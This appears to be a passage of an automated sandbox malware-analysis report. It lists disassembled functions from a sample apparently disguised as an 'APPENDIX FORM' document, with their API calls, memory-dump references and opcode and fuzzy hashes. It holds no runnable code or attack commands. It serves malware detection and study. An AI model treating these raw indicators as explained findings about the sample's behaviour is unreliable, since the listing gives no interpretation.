                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                                              • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1549203181-0
                                                                                                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                              Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3550944819-0
                                                                                                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                              Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • free.MSVCRT ref: 0040F561
                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$free
                                                                                                              • String ID: g4@
                                                                                                              • API String ID: 2888793982-2133833424
                                                                                                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                              Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: @
                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                              Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                              • memset.MSVCRT ref: 0040AF18
                                                                                                              • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1865533344-0
                                                                                                              • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                              • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                              Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 1127616056-0
                                                                                                              • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                              • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                              Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                              • memset.MSVCRT ref: 0042FED3
                                                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID: sqlite_master
                                                                                                              • API String ID: 438689982-3163232059
                                                                                                              • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                              • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                              Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3917621476-0
                                                                                                              • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                              • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                              Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 822687973-0
                                                                                                              • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                              • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                              Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                                                                                                              • free.MSVCRT ref: 0041747F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605342592-0
                                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                              Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                              • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2678498856-0
                                                                                                              • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                              • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                              Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Item
                                                                                                              • String ID:
                                                                                                              • API String ID: 3888421826-0
                                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                              Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3727323765-0
                                                                                                              • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                              • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                              Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                                              • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2754987064-0
                                                                                                              • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                              • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                              Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2754987064-0
                                                                                                              • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                              • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                              Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2754987064-0
                                                                                                              • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
